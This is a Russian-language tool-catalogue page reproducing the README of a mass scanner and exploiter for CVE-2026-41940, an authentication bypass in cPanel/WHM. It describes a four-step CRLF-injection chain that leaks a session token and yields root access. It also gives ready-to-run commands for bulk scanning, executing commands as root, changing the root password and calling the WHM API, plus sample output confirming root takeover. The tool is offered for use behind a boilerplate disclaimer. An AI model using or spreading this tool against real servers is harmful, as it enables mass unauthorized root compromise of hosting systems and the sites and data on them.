Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-41940 — cPanel/WHM CVE-2026-41940 — массовый сканер и эксплоитер | Kitploit
Инструменты/GitHubGitHub/lutfifakee-project/cve-2026-41940
Сканеры уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на ПроникновениеКомандование и УправлениеАутентификацияRed TeamingРазработка Полезной Нагрузки
GitHublutfifakee-project/cve-2026-41940

CVE-2026-41940

cPanel/WHM CVE-2026-41940 — массовый сканер и эксплоитер

254 месяцев назадЕщё не проверено
РепозиторийСайт

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-41940 - Сканер и эксплойт для обхода аутентификации cPanel/WHM

Python License Security Tested on

Сканер и эксплойт для обхода аутентификации cPanel/WHM для CVE-2026-41940


⚠️ Отказ от ответственности

Этот инструмент предоставляется только для образовательных целей и авторизованного тестирования безопасности.

Используя этот инструмент, вы соглашаетесь с тем, что:

  • Вы будете тестировать только те системы, которые принадлежат вам или на которые у вас есть явное письменное разрешение.
  • Вы понимаете, что несанкционированный доступ к компьютерным системам является незаконным.
  • Вы несете полную ответственность за свои действия при использовании этого инструмента.
  • Вы не можете распространять, модифицировать или выдавать этот инструмент за свой собственный.

❗ Автор НЕ несет ответственности за любое неправомерное использование, незаконные действия, ущерб или юридические последствия, возникшие в результате использования этого инструмента.


🎯 Обзор

CVE-2026-41940 — это критическая уязвимость обхода аутентификации в cPanel/WHM, которая может позволить злоумышленникам получить несанкционированный доступ уровня root без действительных учетных данных.

Этот инструмент предоставляет реализацию на Python для:

  • Обнаружения уязвимых целей
  • Автоматизации эксплуатации (для авторизованного тестирования)
  • Выполнения массового сканирования

🔥 4-этапная цепочка атаки

ЭтапОписание
1. ПредаутентификацияОтправить недействительные учетные данные на /login/ для получения cookie whostmgrsession
2. CRLF-инъекцияВнедрить перевод строки через заголовок Authorization: Basic для утечки токена cpsess
3. Распространение токенаЗапустить do_token_denied для распространения токена в кеш
4. ПроверкаОбратиться к /json-api/version для подтверждения доступа root в WHM

✨ Возможности

ФункцияОписание
🔄 Пакетное сканированиеСканирование нескольких целей одновременно
🎯 Одиночная цельСканирование отдельной цели с подробным выводом
🔌 Сканирование портовАвтоматическое сканирование портов WHM (2082, 2083, 2086, 2087)
🔓 URL сессииГенерация URL для входа в WHM в один клик
💀 RCEВыполнение системных команд с правами root
🔑 Смена пароляИзменение пароля root в WHM
📡 Вызовы API WHMВызов функций API WHM
🎨 Цветной выводВизуальный вывод результатов
💾 Экспорт результатовСохранение уязвимых целей в файл

📋 Требования

root@kitploit:~
Python 3.7+
pip install requests urllib3

🚀 Установка

root@kitploit:~
git clone https://github.com/Lutfifakee-Project/CVE-2026-41940.git
cd CVE-2026-41940
pip install -r requirements.txt

# Тест с одной целью
python cpanel-mass-checker.py -u https://your-target.com:2087 -hostname your-target.com

📖 Использование

Основные команды

root@kitploit:~
# Одиночная цель
python cpanel-mass-checker.py -u https://target.com:2087

# Пакетное сканирование
python cpanel-mass-checker.py -f targets.txt -c 20

# Пакетное сканирование со сканированием портов
python cpanel-mass-checker.py -f targets.txt -c 20 --scan-ports -o results.txt

# Генерация URL сессии
python cpanel-mass-checker.py -u https://target.com:2087 -session -hostname target.com

# Смена пароля root
python cpanel-mass-checker.py -u https://target.com:2087 -passwd "NewPass123!" -hostname target.com

# Выполнение команды (RCE)
python cpanel-mass-checker.py -u https://target.com:2087 -cmd "id" -hostname target.com

# Вызов API WHM
python cpanel-mass-checker.py -u https://target.com:2087 -api listaccts -hostname target.com

📄 Формат файла целей (targets.txt)

root@kitploit:~
# Строки, начинающиеся с #, являются комментариями
https://target1.com:2087
target2.com
192.168.1.100
cpanel.example.com:2083

⚙️ Параметры

ПараметрОписаниеПример
-uURL отдельной цели-u https://target.com:2087
-fФайл со списком целей-f targets.txt
-cОдновременность (потоки)-c 20
-oВыходной файл-o results.txt
-hostnameПользовательский заголовок Host-hostname cpanel.target.com
--scan-portsСканировать все порты WHM--scan-ports
-sessionСгенерировать URL входа-session
-passwdИзменить пароль root-passwd "NewPass123"
-cmdВыполнить команду-cmd "id"
-keepСохранить временную учетную запись-keep
-apiВызвать API WHM-api listaccts
-api-paramsПараметры API-api-params "user=root,password=123"

📊 Пример вывода

Пакетное сканирование

root@kitploit:~
[*] Всего: 4 цели (после дедупликации), одновременность: 10
[*] Сканирование портов: ВКЛ (2082, 2083, 2086, 2087)
------------------------------------------------------------
[2/4] [УЯЗВ] https://example.com:2087 - token=/cpsess1048057410
[1/4] [БЕЗОП] safe-target.com
------------------------------------------------------------
[*] Сканирование завершено. Уязвимых: 1
[+] Результаты сохранены в result.txt

Генерация URL сессии

root@kitploit:~
[0] hostname = example.com
[1] создание сессии preauth...
[2] отправка CRLF-инъекции...
[3] запуск do_token_denied...
[4] проверка доступа root в WHM...
[+] Доступ root в WHM получен!
[+] URL сессии:
    https://example.com:2087/cpsessXXXXXXX/

🛡️ Детали уязвимости

ПолеЗначение
CVECVE-2026-41940
СерьезностьКритический (CVSS 9.8)
Вектор атакиСеть
Необходимые привилегииНе требуются
Взаимодействие с пользователемНе требуется

Затронутые версии

  • WHM 11.110.x < 11.110.0.97
  • WHM 11.118.x < 11.118.0.63
  • WHM 11.126.x < 11.126.0.54
  • WHM 11.132.x < 11.132.0.29
  • WHM 11.134.x < 11.134.0.20
  • WHM 11.136.x < 11.136.0.5

⚠️ Важные замечания

  • Используйте только на авторизованных системах
  • Токены сессии быстро истекают
  • RCE может не сработать на ограниченных лицензиях
  • Некоторые цели требуют -hostname
  • Весь трафик использует HTTPS

🧪 Тестовая среда

Для безопасного и законного тестирования:

  • Используйте свой собственный VPS/сервер
  • Настройте уязвимую лабораторную среду
  • Всегда получайте письменное разрешение

⭐ Поддержка

Если этот проект помог вам, поставьте ⭐

Скачать инструмент